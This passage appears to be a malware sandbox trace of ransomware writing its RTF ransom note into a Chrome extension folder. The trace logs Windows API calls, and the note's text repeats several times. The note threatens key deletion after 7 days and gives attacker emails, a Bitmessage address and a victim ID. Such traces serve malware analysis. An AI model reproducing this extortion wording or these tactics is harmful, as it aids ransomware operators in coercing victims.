safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.840] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.841] CloseHandle (hObject=0x2ec) returned 1 [0284.841] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0284.841] GetLastError () returned 0x2 [0284.841] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.842] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, 